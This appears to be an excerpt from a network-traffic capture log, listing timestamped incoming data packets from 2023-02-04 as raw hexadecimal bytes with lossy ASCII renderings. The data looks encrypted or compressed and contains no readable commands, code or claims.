                                                                    2023-02-04 02:57:08 UTC22INData Raw: d9 a4 fd d4 13 09 bc 2e b6 23 12 10 e8 ad 05 72 c2 5c 37 c6 b9 5b cc a5 e2 4c e7 63 3d 74 fa ab ab 7f ac 40 ee cc e4 1e 3e 70 be ac 9f ef 4f cd 75 06 e8 e0 6b c4 6e 2a 27 6e f5 29 19 16 e9 d8 52 89 3d b3 2e 12 31 c4 44 29 45 89 b8 c6 7f 3a 77 78 3e ab 6d 21 9c ea 9f bc 3a 6d fb 87 4a ac 79 9d 34 b9 f4 f3 29 d5 59 71 29 64 07 07 dc e9 f2 c7 61 22 3c 7f 59 2e 6f 25 51 a3 75 96 20 ea 5d 39 62 ba c7 68 d5 2f b1 22 7d 3c 81 49 0a 50 79 a1 21 a0 7b 4b f1 1f 15 26 3a d1 76 39 35 6e c6 20 b2 a4 a2 dc ba a8 ce 65 8c 09 e9 7f 89 d6 2d cc 1b 1d 27 04 9d b8 25 4b a9 80 79 e5 5e 81 88 3e f6 46 46 d3 13 f3 19 19 f5 3a c3 b1 bd 64 ba f9 a9 57 17 57 6c f6 e4 40 06 a9 75 a5 07 8f 76 7e 66 66 b7 4e 08 2d 9a fe ff fc 5a c8 29 70 43 42 47 22 0f 08 4c 88 2d b2 1e 87 11 80 5e
                                                                    Data Ascii: .#r\7[Lc=t@>pOukn*'n)R=.1D)E:wx>m!:mJy4)Yq)da"<Y.o%Qu ]9bh/"}<IPy!{K&:v95n e-'%Ky^>FF:dWWl@uv~ffN-Z)pCBG"L-^
                                                                    2023-02-04 02:57:08 UTC23INData Raw: 74 2b 65 ad 05 f9 4b 9f 01 2f 37 dc 6f b0 93 35 1c 67 34 cb 13 05 af 4f 1f 98 97 81 15 14 71 cd 36 10 86 89 07 3e d5 a6 07 38 5e 33 82 0d e4 7c 35 c9 29 aa 95 7d fd b3 92 76 b0 50 38 60 cc 33 34 0a 15 de b3 8c df 5f 3d 7f ce 02 e0 0b 91 b1 6a 82 1a 1f 7a 0f 40 21 f8 fc d1 1b f1 33 c2 fd 15 d7 7f 89 21 bd e9 ae a8 82 c6 1a 67 a5 9a ca 9d ca 65 76 a0 7d ef 3c be d1 c4 55 af 74 c1 3a c7 f8 84 e2 ae 47 8e d6 89 64 b0 2f e2 6d 46 3a 5c 5b 1f 87 20 3e f0 20 49 98 e8 bc 28 e4 e4 4e 3b 00 1e 48 49 28 8a 5d 3b fd 54 46 9e bf 37 09 3b 76 b5 88 d7 a4 61 23 50 15 28 f7 38 c2 08 bf 42 ca 63 e2 d6 0b 83 7e 5e 3a eb 25 e8 c2 c7 ec b2 85 d0 23 6c f9 38 9e d6 00 1d c3 aa 3d 80 b9 ea d0 14 e5 d7 7b 99 fa 07 a7 be f1 40 8d 93 59 b3 8a fa 21 e6 0f c6 0d 20 1c 8b 5c bd 11 97
                                                                    Data Ascii: t+eK/7o5g4Oq6>8^3|5)}vP8`34_=jz@!3!gev}<Ut:Gd/mF:\[ > I(N;HI(];TF7;va#P(8Bc~^:%#l8={@Y! \
                                                                    2023-02-04 02:57:08 UTC25INData Raw: df d5 93 4b 4f 00 ac fe 87 bb 1c 57 43 d2 65 e6 14 91 41 d7 bf 2e a3 dd cd a7 98 88 2c 69 8b d1 66 75 53 6d 96 37 02 fd 09 90 b9 b0 32 d0 1e de 30 65 7c ec e6 51 ed 71 4e 9d 80 9f 3e 10 26 79 2f f9 bf 3f bd 46 d2 17 9a 8d c2 ae 45 02 cd 18 99 ea f4 3b 22 7e af c9 91 ee f1 bd 0b 99 74 02 cb 24 cd 37 47 b4 6f bc e8 d9 25 61 71 3d 42 29 3a 2d db c6 73 f7 a3 4e 00 30 60 90 77 2d b6 27 07 a4 eb e7 e2 2f e1 5a fa 00 8a 2a 9c 5d e3 48 7e 36 33 44 91 07 43 f8 3a 40 38 82 59 d9 a4 a6 f4 12 18 bf 86 81 0f 18 30 dc bf 1f 54 d6 70 5e 6f ba 51 e3 14 e7 53 a7 03 2c 58 f9 8d 8f 7c a6 6b f9 ca cc da 15 73 b2 a1 54 79 59 cb 5b 22 e9 e0 6d a5 74 d2 09 cb f5 29 19 4e f4 df 7a 59 52 ad 29 38 2c de 40 2a e2 80 b8 e5 2d 3a 77 69 3d 83 40 08 cd ed 82 97 00 1b f8 e8 c5 bb 51 c9
                                                                    Data Ascii: KOWCeA.,ifuSm720e|QqN>&y/?FE;"~t$7Go%aq=B):-sN0`w-'/Z*]H~63DC:@8Y0Tp^oQS,X|ksTyY["mt)NzYR)8,@*-:wi=@Q
                                                                    2023-02-04 02:57:08 UTC26INData Raw: 9f e8 a7 e4 01 55 e6 95 ec 46 0f 02 5a 01 01 2d 77 7e b1 66 b7 42 fc 27 9b 03 f5 c7 bc c8 3a 40 6a 42 4f 73 0f 4d 19 88 2d a2 1e b2 1f a8 16 95 5e 54 e4 73 2b 04 d5 2d ec 00 9d f6 25 0e a6 97 a7 55 5c 8b ad d1 81 e9 c3 19 9c 3b 81 e1 07 df d7 d9 38 cf ce f6 91 7a 6b 30 ad c6 7a d4 d6 4c c6 19 18 6e 61 49 44 b6 b7 e0 32 de d4 8c eb f2 de aa ec 48 43 c7 06 e2 77 bc ad b3 29 dc f1 4c 65 8d cd 1f ae fb ac 14 df 0f 40 e1 59 4d e3 27 a8 da 63 4c 1a 5b 3f af 3c 16 7f f0 10 46 2d 4f a6 06 72 40 b4 ed 26 79 94 6f a1 97 19 0a 19 0b cb 13 72 5e 20 28 9f 8e a6 69 0d 5b 4d 67 12 e9 b9 2d c6 df d8 47 23 6e 33 ae c4 e3 54 0d a0 29 a0 86 7d f4 b3 92 76 48 6a 39 60 c4 9b 4c 0a 15 d0 f6 cc cd 6f 31 4c d3 2a 05 0b c7 b7 47 99 38 c1 f2 fd 0e 26 b8 3b 95 31 89 73 ef f4 37 f0
                                                                    Data Ascii: UFZ-w~fB':@jBOsM-^Ts+-%U\;8zk0zLnaID2HCw)Le@YM'cL[?<F-Or@&yor^ (i[Mg-G#n3T)}vHj9`Lo1L*G8&;1s7
                                                                    2023-02-04 02:57:08 UTC27INData Raw: 9a c3 d6 08 65 db f4 6e fc 06 2e 05 ae 3d ba 90 1a d0 4c e3 ff 85 e7 c0 01 c6 92 70 1e 8d 95 79 a8 a7 fa 37 c7 5a f6 09 0b e6 99 58 95 4e 95 70 82 4a e8 b9 9b f7 50 5d e2 3b eb 2b b9 d2 c0 fd b1 b2 de 4e 1b 43 23 6d 1a 1d 3c db 96 31 a1 9b 02 2b 00 b2 67 08 32 27 56 61 fd a5 65 20 aa ba d7 81 d6 d4 d8 77 ee 44 8e ec eb e1 86 45 73 f9 d4 68 06 8b c2 23 f2 c3 68 be fb 63 58 10 03 00 7d 78 72 60 7a db 7d b2 07 94 96 e2 48 f6 0f 50 9c 57 13 46 25 32 87 7c 89 ed 98 80 07 f2 dd a8 2c 56 21 8a f9 be a6 1a 4a 6f d9 93 e8 ce 33 27 b4 a7 0b c6 bb ac f8 96 d1 2e 73 ef bf 6a 53 54 5b 79 57 28 dd 0f 4c b5 9d ac b8 35 2c 34 4e 70 e7 e6 54 f8 5c 5c bb 92 9e 16 2f 32 61 08 d6 dd 16 fc 40 be 29 b6 80 ea 52 6e 0c cf f5 82 c7 ec cd 3a 00 e6 cb b9 ac d9 81 00 b1 99 09 d9 23
                                                                    Data Ascii: en.=Lpy7ZXNpJP];+NC#m<1+g2'Vae wDEsh#hcX}xr`z}HPWF%2|,V!Jo3'.sjST[yW(L5,4NpT\\/2a@)Rn:#
                                                                    2023-02-04 02:57:08 UTC28INData Raw: e0 6d ec 50 26 0f 52 f5 29 1f 3d ef de 7a 5d 24 ad 05 20 0c 8f 18 29 d2 8d bb dd 36 17 67 4f 39 9f 5a 0d 91 ca aa 22 28 4b ff c2 e5 86 9f bd 64 5a d2 d8 dc cd 74 74 3f 45 01 03 f7 05 f8 ec 61 24 11 6f 40 59 cb 23 77 8d bb 9a 20 ec 73 18 61 ff c7 7b e3 f5 ee 1a 7e 53 08 24 0a 56 13 8d 9c a0 7f 59 83 6d 91 26 3c ce 34 4b 13 79 d9 d3 be a7 8c 86 c9 fb c5 7e ab 3f e2 1e b0 f7 ea 8b 25 ce 1a 22 9c bc 25 8d a9 80 75 92 72 63 24 15 f0 7c 20 b6 7f 9b 79 51 9e 77 a6 d8 b6 a5 10 b5 6c 85 72 31 0f bb 8a 23 68 c5 3b 73 66 82 78 7a 1d 4d a7 c4 8f 2d b0 d0 d5 5f 50 e3 9c 7b 49 ff 7d 58 ce 45 65 d8 2c b3 17 9c 1a 94 42 91 56 7e 8b fc 0b f9 2e 7f 19 7c e0 1d 31 6b c3 f0 db 1e 21 a0 ba c3 af 6c 9a 1d f3 6b 22 e7 1a f1 58 7a a7 86 df f3 40 57 6d 18 14 ee 3c d2 fc 4c de e0
                                                                    Data Ascii: mP&R)=z]$ )6gO9Z"(KdZtt?Ea$o@Y#w sa{~S$VYm&<4Ky~?%"%urc$| yQwlr1#h;sfxzM-_P{I}XEe,BV~.|1k!lk"Xz@Wm<L
                                                                    2023-02-04 02:57:08 UTC29INData Raw: ba 97 55 aa 32 cf 7c 98 77 47 01 c6 b3 0e 15 e4 bc fc ea aa 0a 5d 1a b2 67 bf 26 d5 91 d0 38 19 1b ff 55 4e 25 d4 fb d6 65 a8 26 ef f0 38 ab 24 e6 80 b8 c9 12 29 88 ed dc 4d bc 04 d9 9b ca 7f 65 ae 6c b6 2a a1 98 5a 40 a4 6d da 04 5f c1 a6 fb b1 19 0a ea 8e 31 e7 28 8d c6 4d 3c 49 51 c8 75 d7 3e e3 12 6f 61 8b 30 07 85 f4 2f 28 1e 1b 50 44 0d cb dc 23 9c 47 4d e2 8a 45 09 3f 13 98 ad fc a1 7a 07 d4 04 47 f6 38 cc 74 8b 31 ca 67 c4 c6 58 d6 58 58 3d fc 30 de b1 ef 5a b2 fb 8a 08 6f f7 06 5d e4 7e 5c f3 ae 39 d3 ba eb d0 4a c5 6b aa 18 3f 66 b6 b5 ff 76 9e 82 78 af d9 a5 07 cd 5e c6 18 1a f7 b4 5d 81 5d 87 43 dd 19 aa 9f 98 e6 5f 61 98 1a ca 61 67 18 83 8d c4 c5 90 04 6c 36 54 1a cc 5e 16 fd bc f2 f6 92 eb 2b 02 fc 32 08 00 23 47 73 e4 fa 7c 42 b7 b9 9f cf
                                                                    Data Ascii: U2|wG]g&8UN%e&8$)Mel*Z@m_1(M<IQu>oa0/(PD#GME?zG8t1gXXX=0Zo]~\9Jk?fvx^]]C_aagl6T^+2#Gs|B
                                                                    2023-02-04 02:57:08 UTC31INData Raw: ed f7 59 83 3e 5c bb 96 84 3b 20 01 7b 31 c7 d7 34 9b 66 b8 0f 8e 8d cb af 45 1f 9a 7c 82 c7 ee 36 d5 06 89 b0 91 ea d3 83 1e 84 53 0a ff 03 cf 77 25 b4 65 90 86 20 25 67 1d 19 67 04 3d c8 95 c6 73 83 88 92 6f 70 76 bf 75 31 48 27 07 a8 ba e1 47 1a e0 5a fd 3f b4 12 b9 4b c6 65 78 10 44 42 9b 3d 95 d3 5f 40 3a d1 e5 d9 a4 a8 d2 14 1b d0 5a 9a 22 18 03 d9 86 38 5c fc 48 67 47 b5 70 30 e7 e9 14 ec 60 32 2d 04 a0 a5 7f af 56 c9 1b e3 18 9b 1a 9a 94 7b 49 7b cb 5d 09 e4 e6 7b e6 76 2b 27 2a f4 29 15 34 e5 d8 50 5f 3d b3 2b 08 23 f4 5b 29 d2 89 b8 c6 2d 3a 75 41 7c 83 40 2a 9e f3 92 1c 0f 4b f9 ea d9 80 7a bd 69 9e 89 96 2d cd 70 5c f7 4f 12 3c f4 05 be ec 61 24 1d 6c 5b 50 e4 0c 10 a5 0e 90 3f fa 45 13 40 2e c4 7f b1 ea c3 22 59 78 1d 42 21 a2 fc a6 20 a0 54
                                                                    Data Ascii: Y>\; {14fE|6Sw%e %gg=sopvu1H'GZ?KexDB=_@:Z"8\HgGp0`2-V{I{]{v+'*)4P_=+#[)-:uA|@*Kzi-p\O<a$l[P?E@."YxB! T
                                                                    2023-02-04 02:57:08 UTC32INData Raw: f5 2b 02 a2 90 f5 1a 83 14 26 0f a6 90 b8 6c be ab 06 c7 83 63 f8 d8 9d 3a 25 88 7d db 59 68 b2 97 30 f0 3f d8 6d 1e 66 0f 7b d2 fa 29 94 fa 0b 58 6f 61 e3 b6 b7 e6 7d e8 d5 9d ee 99 4c 83 aa 4e 69 c2 2c c6 50 8b d3 35 29 dc f5 5b 7d be f6 93 dc f1 b0 38 ca 04 72 47 17 5b e1 af cb 22 63 4d b8 47 18 aa 9e 99 57 48 10 31 2b 65 bd 2f b3 d1 eb a0 25 49 9c 78 9d 80 3f 08 0e 91 b2 33 01 a9 21 59 b9 97 8b 6a 3e 5c c4 14 14 c5 f6 2d 38 d4 f3 a0 32 75 c2 a9 29 79 54 0d ce 31 8d 9c 73 c3 9a e7 7c 98 79 14 6b ed b0 06 21 e6 d2 b1 9a cd 6f 3d a1 f0 27 c8 47 c7 b1 60 9e 1e 33 e3 08 4e 23 d9 f0 24 30 27 38 c7 0b 33 d5 7f ce 34 bc e9 ae aa e9 ed ef 6d 7b 89 84 b6 ca 7e 72 cf 2b b8 3c b4 d6 e9 5e d4 57 c5 34 c6 bf ff e3 ae 4b bf ee 81 42 b4 03 8c dc 47 3a 5a 71 3d ac ca
                                                                    Data Ascii: +&lc:%}Yh0?mf{)Xoa}LNi,P5)[}8rG["cMGWH1+e/%Ix?3!Yj>\-82u)yT1s|yk!o='G`3N#$0'834m{~r+<^W4KBG:Zq=
                                                                    2023-02-04 02:57:08 UTC33INData Raw: fa 99 e2 44 6a da 0c ed 7b 67 85 24 8c 8e cb 96 22 5b 2b 6e 1c 49 57 f3 f6 96 3a 94 b4 c0 d8 04 84 64 99 61 2c 5f 76 a5 a8 6c 31 ac 97 31 ab db f2 f8 f9 22 fe c0 9f 8e 87 e3 23 15 9c b1 0c 77 c9 d5 3f d5 d4 4d 82 39 b7 8b f7 4f 1b 76 1d 14 02 34 45 18 ea 66 a5 80 ca 9f 9b 24 b9 9c 76 10 76 3e 30 d3 12 89 ed 9c 95 2a fb f9
                                                                    Data Ascii: Dj{g$"[+nIW:da,_vl11"#w?M9Ov4Ef$vv>0*
                                                                    2023-02-04 02:57:08 UTC33INData Raw: b2 1d f2 00 ac f0 80 b2 3c 7f bc fb ea a0 ae 91 45 d2 ae e1 a3 dd c3 b2 e6 8a 57 07 f5 92 62 76 38 8f 18 36 08 e2 09 92 b5 68 58 94 35 25 30 56 6d ee c0 85 f2 56 77 40 95 b6 9c 2d 27 73 f9 d7 d1 3e bc 50 be 23 9e a6 d4 a5 43 ac e7 19 82 c7 ea 1d 3f 30 e2 c9 ff ea d9 81 28 99 7e 18 db 5e 8b 0a 46 b0 70 b9 a4 fe 23 4f 94 0a 57 08 16 ae 9f ed 86 f1 f3 fc 7e 73 64 93 1c ce 15 26 0d 8e ef e0 b1 56 e0 5a f8 29 f6 97 9f 5d d0 4c 56 64 6f 44 9b 79 30 d8 74 4a 14 a8 59 f6 a6 d7 ba 13 18 bb 05 9f 0a 40 16 f4 8a 71 da d0 5c 46 9a a2 59 b3 8e e1 4c e3 60 3e 5c a8 ab a4 75 c3 cf f9 cc ee c0 12 75 9c 0d 7c c4 53 17 77 67 8d e1 7d ef 60 2e 0f 61 f5 78 79 3d e8 de 7a 5f 3d a8 18 3b 2a c7 40 29 d2 aa b8 c6 3c 38 0c 07 3d 83 44 36 b0 e5 a4 96 00 c2 f9 e8 c9 86 7a 90 64 41
                                                                    Data Ascii: <EWbv86hX5%0VmVw@-'s>P#C?0(~^Fp#OW~sd&VZ)]LVdoDy0tJY@q\FYL`>\uu|Swg}`.axy=z_=;*@)<8=D6zdA
                                                                    2023-02-04 02:57:08 UTC34INData Raw: f1 e3 17 53 52 13 11 b9 f1 20 2f 16 07 8b 48 86 fa 99 48 c4 a7 2d b0 d0 c6 3b a7 37 d6 f0 16 42 77 77 37 94 f7 77 d2 b3 1d b7 08 b0 52 95 1b 52 9a f5 50 04 d1 2b 87 74 84 7b 5d 18 8a ba 98 7e 5f ed c4 a8 82 65 81 1f 9e 55 53 e6 10 d0 5f 6c db 54 ce f6 9a de 02 69 14 c6 70 ca d1 49 cb fd 64 87 69 49 76 aa 9a ec 73 f4 de b6 3a 76 ac 82 aa 4c 68 2a 9c b7 50 9a d7 1e c7 dc f5 5b 6e a6 d2 92 c7 fb ac 15 9e 22 58 d6 49 4d f7 ac f5 c2 4e 40 9e 5e 32 b0 b3 1b 71 60 3c 47 2b 63 86 0b 8e ba b9 20 d1 49 8e 5f b2 97 0c 0a 19 0b b7 13 01 b8 22 00 b4 96 8b 6d 33 5c c4 14 00 e8 c6 83 3e df dc 6d 33 75 c2 ae 01 e2 4f 3d ce 29 f1 92 55 cb cf 92 7c 89 0d 4d 60 c6 b7 10 27 1f fc 88 86 e4 e6 3b 7f de 29 e4 18 cd 9a 99 ed 6a 1b 7f 0c 4c 4a a2 d1 d0 11 89 55 ef f4 37 d6 16 95
                                                                    Data Ascii: SR /HH-;7Bww7wRRP+t{]~_eUS_lTipIdiIvs:vLh*P[n"XIMN@^2q`<G+c I_"m3\>m3uO=)U|M`';)jLJU7
                                                                    2023-02-04 02:57:08 UTC36INData Raw: af 09 6f f9 38 1e f2 04 17 f6 34 44 82 b8 ea d1 3d db d7 6a e6 d3 0f d9 c9 9e 1e 89 81 5b 80 20 f8 07 c7 35 ac 08 0b ec e7 2b 95 4e 93 7a 92 4f 78 9e 98 e8 21 09 f6 1d c1 1f 12 0b 93 9f c5 df 93 a1 7c 26 4f 67 3a 7d 16 f7 c3 a4 87 b0 ef 39 0b aa e7 09 00 2d 39 18 fc a5 6f 0b b1 d8 b3 ac f1 f6 f6 fe 03 f2 5a fe 4d 87 e3 22 7a 35 b1 0e 55 e7 ae 3e df dc 5f 9b 03 ec be d4 74 63 09 11 2a fc e4 42 e7 94 12 be b0 cd f0 5b 25 b9 96 5b 6e 02 2f 32 ac 6a e3 82 14 81 07 f8 dd 99 55 73 8e 1b da f7 b2 37 54 7b af ef bd ae 91 45 d3 ae 1f a2 dd c3 e0 80 88 2c 6d fd 1c d1 62 0e 6d 61 37 02 f1 5a e5 93 b6 48 89 09 ad b9 4c 40 e7 f5 52 e9 55 54 ac 9a 10 a1 3a 7e 16 ab d0 fb 34 ac 49 d1 5a 9c a6 cb db 1a ee e7 1a ed 4c eb 1d 2e 0c 98 bd 91 ea dd 97 60 f6 f2 08 d9 2f ce 0e
                                                                    Data Ascii: o84D=j[ 5+NzOx!|&Og:}9-9oZM"z5U>_tc*B[%[n/2jUs7T{E,mbma7ZHL@RUT:~4IZL.`/
                                                                    2023-02-04 02:57:08 UTC37INData Raw: b4 60 2c 05 4c d6 28 1f 3d 91 ab 7a 5f 39 cd 59 38 2a f0 2f b1 d3 89 b2 ee d5 3a 77 63 b1 b1 40 20 9d 83 d9 91 28 41 c1 e8 c2 ad 79 e5 3e b4 f4 f7 42 04 74 77 05 58 58 1b af 88 53 ec 61 25 02 6a 4d 50 e0 aa e6 b2 57 89 2b f9 5e 15 5f 19 c1 79 d4 8f 9f 24 7f 57 67 dc 0b 56 08 0f 30 a7 68 01 e3 63 81 21 2b de 28 e9 4b 1b c0 fe f3 90 8c ff e1 a8 c4 74 99 9a cf 5f 96 8f 88 d2 33 e6 35 0d e5 cb 4a c2 ac 9f 6f f1 98 81 88 30 f6 88 47 d3 13 ef 16 b8 b3 11 c0 bc f9 e2 b2 f0 8b db 9e 57 6a dd 92 33 0e a0 59 04 0b f1 01 56 07 62 d8 8d d6 2d ba aa 8f ec 5a cc 46 b9 62 42 7d 5b 90 4c 0a 82 3c bf 91 88 1b 80 50 fa 05 52 9a ff 00 5f af 4f f4 1a 81 69 5a 70 d7 96 be 7c 2f 64 ab c7 89 1b fa 19 9c 3e 4c 2e 10 da 53 10 c5 83 ce f2 ff 11 6d 18 1f b8 0b d2 fc 42 82 32 0b 5e
                                                                    Data Ascii: `,L(=z_9Y8*/:wc@ (Ay>BtwXXSa%jMPW+^_y$WgV0hc!+(Kt_35Jo0GWj3YVb-ZFbB}[L<PR_OiZp|/d>L.SmB2^
                                                                    2023-02-04 02:57:08 UTC38INData Raw: 55 cb 30 92 7c 89 53 2c 4c 16 ad 22 f5 15 da 9f f2 3f 6f 3b 75 58 4a e0 0b c6 99 39 92 19 1d 06 40 4e 25 d1 a1 98 1b f7 27 c5 e7 03 d7 79 f9 80 bc e9 a6 82 88 fc cf 66 89 59 e4 b3 35 7e 76 a6 5d 8a 10 6e de ef ae aa 7a c3 1c 91 d1 a8 e5 da ea 97 fb 81 68 b2 3a bd ce 47 25 5a 71 15 a2 d5 3e f2 30 6f b4 0f a2 00 1b f3 4e 3d 31 d6 72 b4 26 84 dc 02 fd 52 6a cf d1 45 0f 4f d7 99 ac fd 8d 6b 1b 8e 69 11 ed 38 c6 0a de 31 ca 72 c8 06 0b 5d 46 70 c6 ef 20 e0 b8 90 5a b2 8f fe 5b 6e f3 15 1a 57 00 06 f2 84 3d bc ab da d2 4c c1 d7 6a e7 43 07 a7 ab be f7 a0 43 4d 80 58 f9 07 cb 7a 9c 2a 0b e6 15 e4 95 4e 96 40 c9 66 f0 99 e1 5e 4e 70 f6 6c 77 61 61 0a b9 88 e7 d5 bb 08 7d 26 45 03 43 7c 07 dd 21 fa 57 ae c3 d4 03 82 6b 1e 8c 07 56 61 fc 8d 36 21 a8 a0 b9 8c f1 f2
                                                                    Data Ascii: U0|S,L"?o;uXJ9@N%'yfY5~v]nzh:G%Zq>0oN=1r&RjEOki81r]Fp Z[nW=LjCCMXz*N@f^Nplwaa}&EC|!WkVa6!
                                                                    2023-02-04 02:57:08 UTC39INData Raw: 5b f8 5d 76 bb 92 8d 26 2f 27 63 25 d1 fb 30 bd 40 af 03 04 89 11 bb 46 11 e7 1e 84 b9 95 1d 24 0a ce 9a 90 ea df f5 a1 99 7e 08 f3 25 e5 19 76 b6 65 b4 ad d8 25 6c 1d 0a 46 22 b3 82 45 d8 5b 0c 88 92 78 65 ec b0 73 42 14 0e 54 a3 c0 e4 b3 18 e0 5a fd 5b b9 1a 9f 5c f0 5b 4e 34 6f 5e 91 16 63 d6 74 40 29 8a 2a f6 74 b2 fc ec 18 bf 00 e5 5d 12 16 fe a8 4d 55 d0 5a 38 ef b9 5b c9 ca e1 4c f4 53 38 74 e0 ab a4 7f a2 40 f9 dd c4 55 3a a3 aa af 83 c4 59 cd 23 77 e9 e0 67 c7 33 2d 0f 72 81 82 1f 3d ee f4 7a 5f 2e 83 2a 38 0a f4 40 29 56 89 b8 d7 0d 51 58 b9 23 ab bf 20 9c ea 94 1d 0a 4b f9 e9 eb fe 78 9b 49 cd d6 f3 2d cc 05 55 0f 4f 00 26 e4 35 fc ec 54 24 11 6c de 41 e6 35 2f 97 0e 9a 24 e8 40 27 67 02 e1 07 5f f1 ee 2e 53 4a 23 4b 2c 7d f6 d3 13 a0 7f 5d f2
                                                                    Data Ascii: []v&/'c%0@F$~%ve%lF"E[xesBTZ[\[N4o^ct@)*t]MUZ8[LS8t@U:Y#wg3-r=z_.*8@)VQX# KxI-UO&5T$lA5/$@'g_.SJ#K,}]
                                                                    2023-02-04 02:57:08 UTC41INData Raw: 17 db 11 eb 0b 8e 6a 5d 94 b5 93 ba 69 45 c2 03 c6 83 6f a3 1c 9c 3a 08 f2 3e d8 50 44 a5 89 d9 ae 83 d2 7c 12 04 cd f4 65 ce 9f fc fd 1c 06 7a 4f 6d b0 a6 e7 db 69 eb ea 17 09 24 96 80 5b 73 c5 1c d1 50 9a d3 b8 29 dc e4 28 ba 97 d5 98 c1 d6 bf 33 ce 0a bd c7 5e 51 e3 c4 a9 db 63 47 d7 94 29 a9 94 3b 5d 63 fb 46 2b 76 9c 2e a5 5f 9f 0b 25 c4 9d 6f a1 e4 de 0b 19 01 dd 3f 08 8f 26 2a f6 5f 8a 6b 21 5b c7 19 e7 fa 8d 02 3e f2 d8 47 38 d0 37 ae 10 91 93 0c c8 23 b8 ba 77 ed b4 90 13 51 72 39 6a ee ab 0b 0a 1f fa 70 aa 1c 71 13 80 d4 02 e6 75 b8 b1 6a 99 76 f3 7f 08 44 0f da fb 0c 1b f7 26 fc c4 34 d5 e8 e6 80 bc 66 a8 82 99 ee f8 3e b2 d1 77 b9 ca 7e 77 b8 50 ac 1a cd 07 c6 51 a0 60 e8 3a e4 d2 be 89 c1 17 96 fb 8a 69 b4 23 a6 26 4c 11 aa 77 9b 1b bf 3a ea
                                                                    Data Ascii: j]iEo:>PD|ezOmi$[sP)(3^QcG);]cF+v._%o?&*_k![>G87#wQr9jpqujvD&4f>w~wPQ`:i#&Lw:
                                                                    2023-02-04 02:57:08 UTC42INData Raw: a2 4e 70 f5 0a e6 62 47 2d b9 e6 4f d7 bb 2c 56 de 45 0b 73 75 16 e2 bd d7 87 b0 eb 2b 03 80 6f 73 99 27 56 65 fe 8d e0 20 a8 ac b4 96 f1 f2 fa ef 3f f4 e6 ac a4 fa 7a 23 15 98 9a f6 5f 8b e5 36 df c9 4e 9e 14 b4 ad d1 65 64 1a 66 8d 06 1f b9 1b c2 e0 be b0 c3 eb ea 24 b9 9e 4b 3d 75 09 14 82 01 10 ed 98 84 2c 0a df b6 05 72 00 b3 fa ab b1 37 54 49 f9 93 cc d5 0b 41 d1 c5 6e 8b 58 c9 9e f9 fc 11 69 f5 90 70 59 54 24 3e 1c 7f 61 24 91 97 9d b4 9e 1d ee 3d 4d 5f ed e6 5b f8 5c 5c bb 90 9c 6d b7 27 79 21 d2 d3 b8 bd 40 b4 57 a1 a6 c1 a7 70 c3 e4 38 a4 ed 97 87 24 00 e2 e2 69 ea da b1 03 99 61 09 d9 25 e5 0a 46 b4 67 96 d6 43 25 67 19 09 7f 87 3d ad 9f b2 32 f3 88 90 65 5e 63 b6 55 68 68 bd 07 a2 c4 c9 32 38 e3 6a f5 2a 86 1a 9f 5d da 48 7e 36 6d 46 ea 8d 63
                                                                    Data Ascii: NpbG-O,VEsu+os'Ve ?z#_6Nedf$K=u,r7TIAnXipYT$>a$=M_[\\m'y!@Wp8$ia%FgC%g=2e^cUhh28j*]H~6mFc
                                                                    2023-02-04 02:57:08 UTC43INData Raw: 74 77 0e 53 3b db f7 05 f8 ca 47 26 13 17 c6 41 e6 20 49 ff 19 c3 37 b2 d4 1c 4a 08 c6 15 64 f1 ee 20 7d 20 da 49 0a 5c 7f 16 21 a0 7b 5b 83 b7 91 26 30 a8 b7 0c 35 6a c2 8d 24 80 8a 9a c7 07 c4 7e a5 2a bc 8c 97 f1 f7 af 83 e2 27 00 99 c1 e4 c2 a8 84 7d e5 e5 81 88 3e c8 18 3d 4e 19 fe 1b 5b 2f 10 c0 b7 94 c2 1d f0 81 e7 15 2c dd dd ec 42 0c db c0 16 07 8b 72 2d 9a 66 b7 40 b9 f9 b1 d4 f4 ee 21 66 29 70 66 40 52 8d 08 d2 0b 88 2b c0 c8 b6 1b 8a 3e 43 5f 52 90 f7 50 ab d1 3a f0 18 a0 85 50 91 a7 96 b8 0b 95 ac ab cd ec b3 8a 19 96 38 58 57 10 da 5d 6c 91 7d c9 69 91 d8 6b 6b c0 c7 7a d8 93 90 ec fb 01 74 14 ff 7c b6 b3 d8 42 21 2b 62 95 42 db 82 ae 70 5f 3e e3 30 2d 2f d3 35 2d e4 d4 a4 82 69 ce a2 d8 fb 04 15 c8 22 cb c7 5e 4a e3 d0 49 da 63 49 95 5d 02
                                                                    Data Ascii: twS;G&A I7Jd } I\!{[&05j$~*'}>=N[/,Br-f@!f)pf@R+>C_RP:P8XW]l}ikkzt|B!+bBp_>0-/5-i"^JIcI]
                                                                    2023-02-04 02:57:08 UTC44INData Raw: 80 9f 90 48 67 a5 8d f8 f4 5a 7f 76 a6 51 97 17 ab bd 77 51 aa 7e ee e4 bf 74 a8 e3 aa 6a 4d 86 28 42 b2 2d a6 16 45 41 cf 71 15 a8 de 39 cf 18 48 9a c8 d3 ec e5 f3 48 39 7e 94 5e 64 3e 72 05 27 d5 18 42 9c da 4f 0b 40 e7 99 ac f8 ab 63 24 b6 63 13 f1 57 0a 0b d0 37 c8 0c 4b cb 26 8b 70 39 39 ef 2a 38 c6 c5 5a b2 81 d7 18 6f f3 13 6e fc 00 6c 99 ae 1b fa b8 ea d1 4f d5 dd 6a a5 c0 07 a7 ba 9e 1e 8d 91 4f b4 8a e3 21 b6 f7 d5 09 0f e4 8f 4d b8 5c b1 13 34 67 f0 9b f7 02 4f 70 fd 30 ef 4a 67 2d b8 7f f1 fc 57 2a 6b 30 69 1c 65 7e 6d 50 bd d7 83 b2 90 85 03 82 69 67 9f 26 56 67 d6 a6 43 0b 42 8c c0 ac ea c2 fd fa 30 f5 c0 8a 17 87 e3 32 17 e7 1c 0e 5f 8c f9 36 dd ad e3 9e 14 b0 ae ff 60 bb 13 1f 14 06 1b d2 f9 eb 66 b4 a6 89 30 d1 24 b9 98 38 f2 77 2f 38 b0
                                                                    Data Ascii: HgZvQwQ~tjM(B-EAq9HH9~^d>r'BO@c$cW7K&p99*8ZonlOjO!M\4gOp0Jg-W*k0ie~mPig&VgCB02_6`f0$8w/8
